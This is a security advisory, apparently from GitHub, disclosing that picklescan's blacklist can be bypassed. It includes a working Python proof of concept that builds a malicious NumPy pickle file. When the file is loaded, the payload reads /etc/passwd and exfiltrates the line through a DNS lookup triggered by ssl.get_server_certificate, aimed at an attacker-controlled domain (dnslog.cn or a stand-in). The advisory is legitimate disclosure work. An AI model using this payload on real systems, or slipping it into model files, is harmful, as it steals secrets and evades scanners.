Picklescan does not detect malicious pickles that exfiltrate sensitive information via DNS after deserialization.
picklescan’s blacklist can be bypassed to exfiltrate sensitive information (like file contents, secrets, or credentials) during model deserialization by leveraging ssl.get_server_certificate
as the callable function in the pickle payload. Since ssl
is a standard Python library used for legitimate TLS operations, it is rarely blacklisted by static scanners or runtime monitors.
The payload avoids flagged modules and instead uses linecache
(also unflagged) to read local files. The exfiltrated data is added to DNS-safe chunks, and embedded as subdomains in a crafted FQDN. When passed to ssl.get_server_certificate
, the Python runtime performs a DNS resolution to the attacker-controlled domain, leaking the encoded content.
The payload executes the following steps:
linecache
modulednslog.cn
ssl.get_server_certificate
Before running the PoC change the fqdn
to your own or a third party that you control. In this PoC we used fqdn = f"{subdomain}.ctmc2q.dnslog.cn"
.
import numpy as np
def create_malicious_model():
# Define the payload class
class DNSLogPayload:
def __reduce__(self):
# Step 1: read a line from /etc/passwd
linecache = __import__("linecache")
first_line = linecache.getline("/etc/passwd", 1).strip()
# Step 2: Sanitize and embed it as a DNS subdomain
subdomain = first_line.replace(":", "_").replace("/", "_")
fqdn = f"{subdomain}.dns-logger.invalid"
# Step 3: Use ssl.get_server_certificate to trigger DNS resolution
ssl_mod = __import__("ssl")
return (getattr(ssl_mod, "get_server_certificate"), ((fqdn, 443),))
# Wrap the payload in a NumPy object array
arr = np.array([DNSLogPayload()], dtype=object)
# Save to .npy file
np.save("dnslog_trigger_payload.npy", arr, allow_pickle=True)
def load_model(model):
try:
return np.load(model, encoding="latin1", fix_imports=True, allow_pickle=1)
except Exception:
raise ValueError("Invalid file")
if __name__ == "__main__":
create_malicious_model()
model = "dnslog_trigger_payload.npy"
print("[i] Loading and executing the model")
data = load_model(model)
{ "nvd_published_at": null, "cwe_ids": [ "CWE-184" ], "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2025-04-07T18:52:47Z" }